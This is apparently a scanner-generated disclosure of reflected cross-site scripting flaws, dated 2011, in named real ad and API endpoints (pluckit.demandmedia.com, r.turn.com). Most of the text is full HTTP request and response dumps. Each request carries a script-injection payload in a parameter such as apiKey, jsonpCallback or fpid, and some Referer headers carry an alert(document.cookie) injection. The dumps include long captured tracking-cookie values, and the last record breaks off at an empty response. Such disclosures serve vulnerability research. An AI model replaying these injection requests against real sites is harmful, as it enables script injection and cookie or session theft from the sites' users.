This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the jpctx request parameter is copied into the HTML document as plain text between tags. The payload fa896<script>alert(1)</script>11222906e44 was submitted in the jpctx parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the apiKey request parameter is copied into the HTML document as plain text between tags. The payload 3767e<script>alert(1)</script>480207bdcb8 was submitted in the apiKey parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /requests?apiKey=c1e69f40-d871-4fed-8266-8c2fb07d10a73767e<script>alert(1)</script>480207bdcb8&jsonpCallback=dmpod.RequestServiceInstances['pluckit_140100923442'].jsonpCallback&jsonpContext=request_442381374318&jsonRequest=%7B%22Envelopes%22%3A%5B%7B%22callerSDK%22%3A%22js%3A7315%22%2C%22objectType%22%3A%22Core.RequestEnvelope%22%2C%22payloadType%22%3A%22Customers.GetCustomerRequest%22%2C%22payload%22%3A%22%7B%5C%22callerSDK%5C%22%3A%5C%22js%3A7315%5C%22%2C%5C%22objectType%5C%22%3A%5C%22Customers.GetCustomerRequest%5C%22%7D%22%7D%2C%7B%22callerSDK%22%3A%22js%3A7315%22%2C%22objectType%22%3A%22Core.RequestEnvelope%22%2C%22payloadType%22%3A%22Content.GetRelatedAdLinksRequest%22%2C%22payload%22%3A%22%7B%5C%22pageUrl%5C%22%3A%5C%22http%3A//mortgage.ocregister.com/%5C%22%2C%5C%22callerSDK%5C%22%3A%5C%22js%3A7315%5C%22%2C%5C%22objectType%5C%22%3A%5C%22Content.GetRelatedAdLinksRequest%5C%22%2C%5C%22searchTerm%5C%22%3A%5C%22%5C%22%2C%5C%22returnQueryParams%5C%22%3A%5C%22%5C%22%2C%5C%22reportingDomain%5C%22%3A%5C%22%5C%22%2C%5C%22numberOfSearchLinks%5C%22%3A%5C%225%5C%22%2C%5C%22numberOfResultLinks%5C%22%3A%5C%225%5C%22%2C%5C%22tagsProvider%5C%22%3A%5C%22%5C%22%2C%5C%22matchMethod%5C%22%3A%5C%22smoothedkeywords%5C%22%2C%5C%22articlesTaken%5C%22%3A%5C%2210%5C%22%2C%5C%22articlesThreshold%5C%22%3A%5C%223%5C%22%7D%22%7D%5D%2C%22returnDiagnostics%22%3Afalse%2C%22executeMethod%22%3A%22ExecuteAll%22%2C%22callerSDK%22%3A%22js%3A7315%22%7D HTTP/1.1 Host: pluckit.demandmedia.com Proxy-Connection: keep-alive Referer: http://mortgage.ocregister.com/feeda71cd%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E1f35e8c0ea2/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: anonId=cff8d33d-b33f-4e84-83eb-d9f6a41823a1; BIGipServerPluckit2.Webpool-80=908461834.20480.0000
Response
HTTP/1.1 200 OK Cache-Control: public, must-revalidate Pragma: PluckOnDemandApiRev=7315 Content-Length: 920 Content-Type: application/json; charset=utf-8 Expires: Thu, 03 Feb 2011 19:03:22 GMT Server: Microsoft-IIS/6.0 P3P: policyref="/w3c/p3p.xml?apiKey=00000000-0000-0000-0000-000000000000", CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT" X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Date: Thu, 03 Feb 2011 19:03:22 GMT
The value of the jsonpCallback request parameter is copied into the HTML document as plain text between tags. The payload 546ff<script>alert(1)</script>aa268e625b5 was submitted in the jsonpCallback parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /requests?apiKey=c1e69f40-d871-4fed-8266-8c2fb07d10a7&jsonpCallback=dmpod.RequestServiceInstances['pluckit_140100923442'].jsonpCallback546ff<script>alert(1)</script>aa268e625b5&jsonpContext=request_442381374318&jsonRequest=%7B%22Envelopes%22%3A%5B%7B%22callerSDK%22%3A%22js%3A7315%22%2C%22objectType%22%3A%22Core.RequestEnvelope%22%2C%22payloadType%22%3A%22Customers.GetCustomerRequest%22%2C%22payload%22%3A%22%7B%5C%22callerSDK%5C%22%3A%5C%22js%3A7315%5C%22%2C%5C%22objectType%5C%22%3A%5C%22Customers.GetCustomerRequest%5C%22%7D%22%7D%2C%7B%22callerSDK%22%3A%22js%3A7315%22%2C%22objectType%22%3A%22Core.RequestEnvelope%22%2C%22payloadType%22%3A%22Content.GetRelatedAdLinksRequest%22%2C%22payload%22%3A%22%7B%5C%22pageUrl%5C%22%3A%5C%22http%3A//mortgage.ocregister.com/%5C%22%2C%5C%22callerSDK%5C%22%3A%5C%22js%3A7315%5C%22%2C%5C%22objectType%5C%22%3A%5C%22Content.GetRelatedAdLinksRequest%5C%22%2C%5C%22searchTerm%5C%22%3A%5C%22%5C%22%2C%5C%22returnQueryParams%5C%22%3A%5C%22%5C%22%2C%5C%22reportingDomain%5C%22%3A%5C%22%5C%22%2C%5C%22numberOfSearchLinks%5C%22%3A%5C%225%5C%22%2C%5C%22numberOfResultLinks%5C%22%3A%5C%225%5C%22%2C%5C%22tagsProvider%5C%22%3A%5C%22%5C%22%2C%5C%22matchMethod%5C%22%3A%5C%22smoothedkeywords%5C%22%2C%5C%22articlesTaken%5C%22%3A%5C%2210%5C%22%2C%5C%22articlesThreshold%5C%22%3A%5C%223%5C%22%7D%22%7D%5D%2C%22returnDiagnostics%22%3Afalse%2C%22executeMethod%22%3A%22ExecuteAll%22%2C%22callerSDK%22%3A%22js%3A7315%22%7D HTTP/1.1 Host: pluckit.demandmedia.com Proxy-Connection: keep-alive Referer: http://mortgage.ocregister.com/feeda71cd%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E1f35e8c0ea2/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: anonId=cff8d33d-b33f-4e84-83eb-d9f6a41823a1; BIGipServerPluckit2.Webpool-80=908461834.20480.0000
Response
HTTP/1.1 200 OK Cache-Control: public, must-revalidate Pragma: PluckOnDemandApiRev=7315 Content-Length: 4368 Content-Type: application/json; charset=utf-8 Expires: Thu, 03 Feb 2011 19:03:26 GMT Server: Microsoft-IIS/6.0 P3P: policyref="/w3c/p3p.xml?apiKey=00000000-0000-0000-0000-000000000000", CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT" X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Date: Thu, 03 Feb 2011 19:03:25 GMT
The value of the jsonpContext request parameter is copied into the HTML document as plain text between tags. The payload 6b2fe<script>alert(1)</script>7d41626bf96 was submitted in the jsonpContext parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /requests?apiKey=c1e69f40-d871-4fed-8266-8c2fb07d10a7&jsonpCallback=dmpod.RequestServiceInstances['pluckit_140100923442'].jsonpCallback&jsonpContext=request_4423813743186b2fe<script>alert(1)</script>7d41626bf96&jsonRequest=%7B%22Envelopes%22%3A%5B%7B%22callerSDK%22%3A%22js%3A7315%22%2C%22objectType%22%3A%22Core.RequestEnvelope%22%2C%22payloadType%22%3A%22Customers.GetCustomerRequest%22%2C%22payload%22%3A%22%7B%5C%22callerSDK%5C%22%3A%5C%22js%3A7315%5C%22%2C%5C%22objectType%5C%22%3A%5C%22Customers.GetCustomerRequest%5C%22%7D%22%7D%2C%7B%22callerSDK%22%3A%22js%3A7315%22%2C%22objectType%22%3A%22Core.RequestEnvelope%22%2C%22payloadType%22%3A%22Content.GetRelatedAdLinksRequest%22%2C%22payload%22%3A%22%7B%5C%22pageUrl%5C%22%3A%5C%22http%3A//mortgage.ocregister.com/%5C%22%2C%5C%22callerSDK%5C%22%3A%5C%22js%3A7315%5C%22%2C%5C%22objectType%5C%22%3A%5C%22Content.GetRelatedAdLinksRequest%5C%22%2C%5C%22searchTerm%5C%22%3A%5C%22%5C%22%2C%5C%22returnQueryParams%5C%22%3A%5C%22%5C%22%2C%5C%22reportingDomain%5C%22%3A%5C%22%5C%22%2C%5C%22numberOfSearchLinks%5C%22%3A%5C%225%5C%22%2C%5C%22numberOfResultLinks%5C%22%3A%5C%225%5C%22%2C%5C%22tagsProvider%5C%22%3A%5C%22%5C%22%2C%5C%22matchMethod%5C%22%3A%5C%22smoothedkeywords%5C%22%2C%5C%22articlesTaken%5C%22%3A%5C%2210%5C%22%2C%5C%22articlesThreshold%5C%22%3A%5C%223%5C%22%7D%22%7D%5D%2C%22returnDiagnostics%22%3Afalse%2C%22executeMethod%22%3A%22ExecuteAll%22%2C%22callerSDK%22%3A%22js%3A7315%22%7D HTTP/1.1 Host: pluckit.demandmedia.com Proxy-Connection: keep-alive Referer: http://mortgage.ocregister.com/feeda71cd%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E1f35e8c0ea2/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: anonId=cff8d33d-b33f-4e84-83eb-d9f6a41823a1; BIGipServerPluckit2.Webpool-80=908461834.20480.0000
Response
HTTP/1.1 200 OK Cache-Control: public, must-revalidate Pragma: PluckOnDemandApiRev=7315 Content-Length: 4388 Content-Type: application/json; charset=utf-8 Expires: Thu, 03 Feb 2011 19:03:29 GMT Server: Microsoft-IIS/6.0 P3P: policyref="/w3c/p3p.xml?apiKey=00000000-0000-0000-0000-000000000000", CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT" X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Date: Thu, 03 Feb 2011 19:03:28 GMT
The value of the fpid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6506f"><script>alert(1)</script>91c27bc8e67 was submitted in the fpid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /server/pixel.htm?fpid=6506f"><script>alert(1)</script>91c27bc8e67&sp=y&admeld_call_type=iframe&admeld_user_id=6acccca4-d0e4-464e-a824-f67cb28d5556&admeld_adprovider_id=24&admeld_call_type=iframe&admeld_callback=http://tag.admeld.com/match HTTP/1.1 Host: r.turn.com Proxy-Connection: keep-alive Referer: http://tag.admeld.com/ad/iframe/80/accuweather/728x90/accuweather_atf?t=1296754761812&tz=360&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.accuweather.com%2Fmaps-satellite.asp&refer=http%3A%2F%2Fburp%2Fshow%2F64 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: adImpCount=oh0PP3N04fRnBd11giaMRn0GaIuFFc6KU0t95Ihox42Y481wEkFtGX7HudJA1SwJCBsZxoRT6EzfAaBOxC9wKTt4volhK1SKMMEXrRaSQRZi9OYrtG-b0iAWL5Sg__z6Mu5dojwn5g9wbHIYb9itxx7GYSyR957eDlUpeFx78rhPAxXzEzYUFqdsvXkuFIOa3SJBwxhTK9UwlXAscYO_M4PWvpR2lvg2CTziw80-4erd7x2ac5D5zjijBHgETImH6J7mzrOj8gbZmvqalfHq1zOWaaEkLYgoCjpzZqrIOb4Fr-22QJE64x-hU4KLgyMywYPBSo2jlvAF8lq_IygKlasFwtDx2lJttCmO3ikXUoRriPGYYJIwMnnp0drU0iPKrDDCOXkqJdp6fs-m5LFp06AT3l7X8Fu562OsS_bZq3w-94h_yPZdjrrVWBfP28qvw5g9aOhI5RNPyE9rahUCbt3lzlA6-E_XLXUwKlz8M8Rge-axmvL7QRbbVTcWH_69gNe7Lp99y-WLm2CQwebhsP78DoTX-MltELREBCeeahldH37m3WrGWRs0rxyrhTIvfNDSBptsBfTCIkNpNIZ-estuyxh9bLEhi_2rYF-v3jU-PyGR7zYZKkURVc4VktqypCu6kLg-kmXa4JYXwL5SDme2jKGznyNxnorhkYhuuyfTrtrFY_vsI0N2lko9YuVLMugtX4JGvQuQNrdCkfnoNLQy3HrDk_mqO0a-EdfNtHhVS8ISxl2FC-QxoYM1dFQriDP20OwUBwmVn04CK7SdmOrNneCQeM0Mtq9X6LYgOadpuC766m5RMjVQV9XDrztlefh7m2CDoV_VGAxZRTmH65-iEOjj626Xr9a4PyPR4yMPDZSQiR8N05VXl8Kl5CF5wYPBSo2jlvAF8lq_IygKlQ4AcvxicaQ0QJv3A-NEwrP_vYlQQcTfv4G9VvPeZUwSrDDCOXkqJdp6fs-m5LFp05G3ZVFVoXjdVnl7Wbi3hO0-94h_yPZdjrrVWBfP28qvxkUWUDF6X3KpqQdl41aNM0RM74xthkDRQvK455LrVCLLNoiMiQCbY7XGffLYXA_SuLQTgLh8g9Qs477VuC83If78DoTX-MltELREBCeeahlgVK-gLzc7v3bufMT3ciwRPOq7W_c7yCEewncWyerLNirskINCTJZ2w2X1u_Ffr45hIaHa_H76oN5ioqf3DUNypCu6kLg-kmXa4JYXwL5SDgVZpbAYwmSs52tJ3ph4JCMa2L50HxvswuEv77HCRTvKMugtX4JGvQuQNrdCkfnoNG4mlIa-6dAvewF741vW4jhVS8ISxl2FC-QxoYM1dFQrs_FmoMnxSVp_tZOCUusIKmakJ6Zxx4MaHG4qowJX52cdsqn6EbbEHzpw1cahm_ednSAyZag0hguPHBGDv4D0F89cj7I3Xm3rPyyOvzQMcybDLE8i5ZewRD7RValSE2YFn6IQ6OPrbpev1rg_I9HjI5ynCo2hqWp8ighHIhRcz2nBg8FKjaOW8AXyWr8jKAqVscXOphesMEv_hKT95FZL-tNurEXc2b78YksLyMCs4H6sMMI5eSol2np-z6bksWnTTE9U8rPoK07OvagfeUFMTT73iH_I9l2OutVYF8_byq_c1Kq7NjC9E9a0eoW9ANcQm2_M-Vs_XiB22OkRMt9wZss2iIyJAJtjtcZ98thcD9J5TC-ggthaT5RIrPMrgXzf_vwOhNf4yW0QtEQEJ55qGc-5cVQ6I7r0sZiLYoBNLt9wJREdAQCGkjhwfIbDh8eKH3liqW8YkScefdM86sUHP_PaiF7fYodG30TCcbE3BCWkK7qQuD6SZdrglhfAvlIOyAmQVZ9Gk9LJN20oRH7d9xucJsk9KwezSI69frNhlnh-VzDUnvD0VSF9GprGKshZpvViBXcPLi1FjMYUJVEbmFVLwhLGXYUL5DGhgzV0VCtu-wgzPw8HAJyjq29STFT-1YYia3j2kAHlFsKaEZ4FVzZEDIrmol-EatT1dqZXDk0mJSx72jjc-JYaXuGhWqtrn6IQ6OPrbpev1rg_I9HjI98tK4Lkd3yYgSLJJRfeUv3Bg8FKjaOW8AXyWr8jKAqVIJgqaELa9gf4ED3OCBald8enkhYgNEwqu2cgvufAu8qsMMI5eSol2np-z6bksWnTbV-gOod-LZDuMZIGw8px0j73iH_I9l2OutVYF8_byq-eWXxP40DPBXd3KCfiOrroHIw5X3-Sh4HUjnsSaxC0epuc0uDxDHt-rTBh2e9nLtgi0gluZrsw7wDK_J5brg91_vwOhNf4yW0QtEQEJ55qGXFlxPVND7eK0NKkmYcNg9jOWDFl6Eb2AIoC5V4JNNKLUZ0sucMJLd08lMBqbvDIPaQ9DijJjsm5f6UC3GKLnVdkeGy8tt3_Zt_zWHCziuKg5syEq3UFt31YVe3zZxRiTrPsbMN1vS3TFG_DmRWjBGoobKMAs1_SjcmCMyMVnnvXgJ4GX4OjUVNjX2CulbPhbYCeBl-Do1FTY19grpWz4W2AngZfg6NRU2NfYK6Vs-FtgeS-Ii0cHw18f8N_OREqrYbydaelxbY-p8EgzRBPnFKG8nWnpcW2PqfBIM0QT5xShvJ1p6XFtj6nwSDNEE-cUtG5oMP1xzBs04f9aYcpef_h-9zvu-4SLKmRwnyZzNBL4fvc77vuEiypkcJ8mczQS-H73O-77hIsqZHCfJnM0EtFERdyopXzmQlD9vlwvmYOVcj84RfJT-7cTVPiV9xkT9uAa-_yMHADocL3iDyiyA0F0KdTVDhrtMOpab3gV8JpWhzPlVze60NJNLk_VPM-uFocz5Vc3utDSTS5P1TzPrhaHM-VXN7rQ0k0uT9U8z64YjuojwRqay5-ZAaNIzcU3yt_K6BkSAdnJ6PGav_ruqgeixqa40KlkYUwYv6ONa9cufe3IUZ5SPWBETiwrd17lbFsu3zfiF7BPBJIiLSApNR1VhafmVnk6BhX_Sepv3rucGr9Pv9WxoR207LV_JU812XpzTAYSv-BElQmRmwUjrxl6c0wGEr_gRJUJkZsFI68ZenNMBhK_4ESVCZGbBSOvL-FrFoAGy0sFOEtM5Nuv1rHf67HEvueUzrmEU5VKarK0pFHmk8ureZOA97fEANKtQvhIyyKReEJO7XhpyT2HyIL4SMsikXhCTu14ack9h8i0WpNDrvYk58e1CQBxU9aoW0GgBz7JE6lT1FzCJ5VNfptBoAc-yROpU9RcwieVTX6OyZXhK3RWfu9UgjQxzq_ZTsmV4St0Vn7vVII0Mc6v2U7JleErdFZ-71SCNDHOr9lOyZXhK3RWfu9UgjQxzq_ZVXO01XiSEZlE5C1tJgs0ioM_0RPnIuudzXDvK7K8vPFDP9ET5yLrnc1w7yuyvLzxQz_RE-ci653NcO8rsry88UM_0RPnIuudzXDvK7K8vPFdLmcsxIHfv-CcNp2nsZsDDJxgXJI7GH1VuUBYoyz48YycYFySOxh9VblAWKMs-PGv29VFO9u1uo-sTqh6dCOpkhLk4ViUsMPsWwjDbC_pXdIS5OFYlLDD7FsIw2wv6V3SEuThWJSww-xbCMNsL-ld3iOttRS0QEfXzzQ32Qakh0VYOKF3X7wdD8Dnz7l4C4j; fc=dwiJhIujIVbWqBI35CB1OVbkGHNm9MZWojpB1E5U-cOGOfbqfFQm5pwhAgorFe5OpCs1-fF4q_ECi-WQMxkK-aafXvxyVel7cEBnUzfP3drCT5fAUiA9uMZMwBt1WFOe2yqvnTRFFJZ0ii36dSFkNQ; rrs=1%7C2%7C3%7C4%7Cundefined%7C6%7C7%7C8%7C9%7C1001%7C1002%7C1003%7C10%7C1004%7C1005; rds=14987%7C15001%7C14999%7C15001%7Cundefined%7C15003%7C15001%7C15001%7C15001%7C15001%7C15003%7C15003%7C14983%7C15003%7C15003; rv=1; pf=vYlmmNe4wlXMju21sv8E9BbQtqzBjZadwYr3eEaEEdXu2q8_Jo62qDoNU1sRcsTDMLxOqe5U8OfgCnbpqI2ApX4lLZyvKs0UYrWi2iSsDx65o3Pzwoz6403H7SSItm-xFnOkZRhnTAf1OsSeg86x6N9he2SzgZbMiSxi7XoC0oDOTz_hW1W1inw2PPTXkr5M6IAD_gZxI523_TIIsV7tK-AIolHB94EOuCprrHzPsXFXUf33lMkSWcP-I3s4DQm5; uid=3011330574290390485
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 P3P: policyref="http://ad.turn.com/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV" Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0 Pragma: no-cache Set-Cookie: uid=3011330574290390485; Domain=.turn.com; Expires=Tue, 02-Aug-2011 19:03:00 GMT; Path=/ Content-Type: text/html;charset=UTF-8 Vary: Accept-Encoding Date: Thu, 03 Feb 2011 19:02:59 GMT Content-Length: 377
The value of the sp request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 38030"><script>alert(1)</script>3e8a29e1991 was submitted in the sp parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /server/pixel.htm?fpid=4&sp=38030"><script>alert(1)</script>3e8a29e1991&admeld_call_type=iframe&admeld_user_id=6acccca4-d0e4-464e-a824-f67cb28d5556&admeld_adprovider_id=24&admeld_call_type=iframe&admeld_callback=http://tag.admeld.com/match HTTP/1.1 Host: r.turn.com Proxy-Connection: keep-alive Referer: http://tag.admeld.com/ad/iframe/80/accuweather/728x90/accuweather_atf?t=1296754761812&tz=360&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.accuweather.com%2Fmaps-satellite.asp&refer=http%3A%2F%2Fburp%2Fshow%2F64 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: adImpCount=oh0PP3N04fRnBd11giaMRn0GaIuFFc6KU0t95Ihox42Y481wEkFtGX7HudJA1SwJCBsZxoRT6EzfAaBOxC9wKTt4volhK1SKMMEXrRaSQRZi9OYrtG-b0iAWL5Sg__z6Mu5dojwn5g9wbHIYb9itxx7GYSyR957eDlUpeFx78rhPAxXzEzYUFqdsvXkuFIOa3SJBwxhTK9UwlXAscYO_M4PWvpR2lvg2CTziw80-4erd7x2ac5D5zjijBHgETImH6J7mzrOj8gbZmvqalfHq1zOWaaEkLYgoCjpzZqrIOb4Fr-22QJE64x-hU4KLgyMywYPBSo2jlvAF8lq_IygKlasFwtDx2lJttCmO3ikXUoRriPGYYJIwMnnp0drU0iPKrDDCOXkqJdp6fs-m5LFp06AT3l7X8Fu562OsS_bZq3w-94h_yPZdjrrVWBfP28qvw5g9aOhI5RNPyE9rahUCbt3lzlA6-E_XLXUwKlz8M8Rge-axmvL7QRbbVTcWH_69gNe7Lp99y-WLm2CQwebhsP78DoTX-MltELREBCeeahldH37m3WrGWRs0rxyrhTIvfNDSBptsBfTCIkNpNIZ-estuyxh9bLEhi_2rYF-v3jU-PyGR7zYZKkURVc4VktqypCu6kLg-kmXa4JYXwL5SDme2jKGznyNxnorhkYhuuyfTrtrFY_vsI0N2lko9YuVLMugtX4JGvQuQNrdCkfnoNLQy3HrDk_mqO0a-EdfNtHhVS8ISxl2FC-QxoYM1dFQriDP20OwUBwmVn04CK7SdmOrNneCQeM0Mtq9X6LYgOadpuC766m5RMjVQV9XDrztlefh7m2CDoV_VGAxZRTmH65-iEOjj626Xr9a4PyPR4yMPDZSQiR8N05VXl8Kl5CF5wYPBSo2jlvAF8lq_IygKlQ4AcvxicaQ0QJv3A-NEwrP_vYlQQcTfv4G9VvPeZUwSrDDCOXkqJdp6fs-m5LFp05G3ZVFVoXjdVnl7Wbi3hO0-94h_yPZdjrrVWBfP28qvxkUWUDF6X3KpqQdl41aNM0RM74xthkDRQvK455LrVCLLNoiMiQCbY7XGffLYXA_SuLQTgLh8g9Qs477VuC83If78DoTX-MltELREBCeeahlgVK-gLzc7v3bufMT3ciwRPOq7W_c7yCEewncWyerLNirskINCTJZ2w2X1u_Ffr45hIaHa_H76oN5ioqf3DUNypCu6kLg-kmXa4JYXwL5SDgVZpbAYwmSs52tJ3ph4JCMa2L50HxvswuEv77HCRTvKMugtX4JGvQuQNrdCkfnoNG4mlIa-6dAvewF741vW4jhVS8ISxl2FC-QxoYM1dFQrs_FmoMnxSVp_tZOCUusIKmakJ6Zxx4MaHG4qowJX52cdsqn6EbbEHzpw1cahm_ednSAyZag0hguPHBGDv4D0F89cj7I3Xm3rPyyOvzQMcybDLE8i5ZewRD7RValSE2YFn6IQ6OPrbpev1rg_I9HjI5ynCo2hqWp8ighHIhRcz2nBg8FKjaOW8AXyWr8jKAqVscXOphesMEv_hKT95FZL-tNurEXc2b78YksLyMCs4H6sMMI5eSol2np-z6bksWnTTE9U8rPoK07OvagfeUFMTT73iH_I9l2OutVYF8_byq_c1Kq7NjC9E9a0eoW9ANcQm2_M-Vs_XiB22OkRMt9wZss2iIyJAJtjtcZ98thcD9J5TC-ggthaT5RIrPMrgXzf_vwOhNf4yW0QtEQEJ55qGc-5cVQ6I7r0sZiLYoBNLt9wJREdAQCGkjhwfIbDh8eKH3liqW8YkScefdM86sUHP_PaiF7fYodG30TCcbE3BCWkK7qQuD6SZdrglhfAvlIOyAmQVZ9Gk9LJN20oRH7d9xucJsk9KwezSI69frNhlnh-VzDUnvD0VSF9GprGKshZpvViBXcPLi1FjMYUJVEbmFVLwhLGXYUL5DGhgzV0VCtu-wgzPw8HAJyjq29STFT-1YYia3j2kAHlFsKaEZ4FVzZEDIrmol-EatT1dqZXDk0mJSx72jjc-JYaXuGhWqtrn6IQ6OPrbpev1rg_I9HjI98tK4Lkd3yYgSLJJRfeUv3Bg8FKjaOW8AXyWr8jKAqVIJgqaELa9gf4ED3OCBald8enkhYgNEwqu2cgvufAu8qsMMI5eSol2np-z6bksWnTbV-gOod-LZDuMZIGw8px0j73iH_I9l2OutVYF8_byq-eWXxP40DPBXd3KCfiOrroHIw5X3-Sh4HUjnsSaxC0epuc0uDxDHt-rTBh2e9nLtgi0gluZrsw7wDK_J5brg91_vwOhNf4yW0QtEQEJ55qGXFlxPVND7eK0NKkmYcNg9jOWDFl6Eb2AIoC5V4JNNKLUZ0sucMJLd08lMBqbvDIPaQ9DijJjsm5f6UC3GKLnVdkeGy8tt3_Zt_zWHCziuKg5syEq3UFt31YVe3zZxRiTrPsbMN1vS3TFG_DmRWjBGoobKMAs1_SjcmCMyMVnnvXgJ4GX4OjUVNjX2CulbPhbYCeBl-Do1FTY19grpWz4W2AngZfg6NRU2NfYK6Vs-FtgeS-Ii0cHw18f8N_OREqrYbydaelxbY-p8EgzRBPnFKG8nWnpcW2PqfBIM0QT5xShvJ1p6XFtj6nwSDNEE-cUtG5oMP1xzBs04f9aYcpef_h-9zvu-4SLKmRwnyZzNBL4fvc77vuEiypkcJ8mczQS-H73O-77hIsqZHCfJnM0EtFERdyopXzmQlD9vlwvmYOVcj84RfJT-7cTVPiV9xkT9uAa-_yMHADocL3iDyiyA0F0KdTVDhrtMOpab3gV8JpWhzPlVze60NJNLk_VPM-uFocz5Vc3utDSTS5P1TzPrhaHM-VXN7rQ0k0uT9U8z64YjuojwRqay5-ZAaNIzcU3yt_K6BkSAdnJ6PGav_ruqgeixqa40KlkYUwYv6ONa9cufe3IUZ5SPWBETiwrd17lbFsu3zfiF7BPBJIiLSApNR1VhafmVnk6BhX_Sepv3rucGr9Pv9WxoR207LV_JU812XpzTAYSv-BElQmRmwUjrxl6c0wGEr_gRJUJkZsFI68ZenNMBhK_4ESVCZGbBSOvL-FrFoAGy0sFOEtM5Nuv1rHf67HEvueUzrmEU5VKarK0pFHmk8ureZOA97fEANKtQvhIyyKReEJO7XhpyT2HyIL4SMsikXhCTu14ack9h8i0WpNDrvYk58e1CQBxU9aoW0GgBz7JE6lT1FzCJ5VNfptBoAc-yROpU9RcwieVTX6OyZXhK3RWfu9UgjQxzq_ZTsmV4St0Vn7vVII0Mc6v2U7JleErdFZ-71SCNDHOr9lOyZXhK3RWfu9UgjQxzq_ZVXO01XiSEZlE5C1tJgs0ioM_0RPnIuudzXDvK7K8vPFDP9ET5yLrnc1w7yuyvLzxQz_RE-ci653NcO8rsry88UM_0RPnIuudzXDvK7K8vPFdLmcsxIHfv-CcNp2nsZsDDJxgXJI7GH1VuUBYoyz48YycYFySOxh9VblAWKMs-PGv29VFO9u1uo-sTqh6dCOpkhLk4ViUsMPsWwjDbC_pXdIS5OFYlLDD7FsIw2wv6V3SEuThWJSww-xbCMNsL-ld3iOttRS0QEfXzzQ32Qakh0VYOKF3X7wdD8Dnz7l4C4j; fc=dwiJhIujIVbWqBI35CB1OVbkGHNm9MZWojpB1E5U-cOGOfbqfFQm5pwhAgorFe5OpCs1-fF4q_ECi-WQMxkK-aafXvxyVel7cEBnUzfP3drCT5fAUiA9uMZMwBt1WFOe2yqvnTRFFJZ0ii36dSFkNQ; rrs=1%7C2%7C3%7C4%7Cundefined%7C6%7C7%7C8%7C9%7C1001%7C1002%7C1003%7C10%7C1004%7C1005; rds=14987%7C15001%7C14999%7C15001%7Cundefined%7C15003%7C15001%7C15001%7C15001%7C15001%7C15003%7C15003%7C14983%7C15003%7C15003; rv=1; pf=vYlmmNe4wlXMju21sv8E9BbQtqzBjZadwYr3eEaEEdXu2q8_Jo62qDoNU1sRcsTDMLxOqe5U8OfgCnbpqI2ApX4lLZyvKs0UYrWi2iSsDx65o3Pzwoz6403H7SSItm-xFnOkZRhnTAf1OsSeg86x6N9he2SzgZbMiSxi7XoC0oDOTz_hW1W1inw2PPTXkr5M6IAD_gZxI523_TIIsV7tK-AIolHB94EOuCprrHzPsXFXUf33lMkSWcP-I3s4DQm5; uid=3011330574290390485
Response
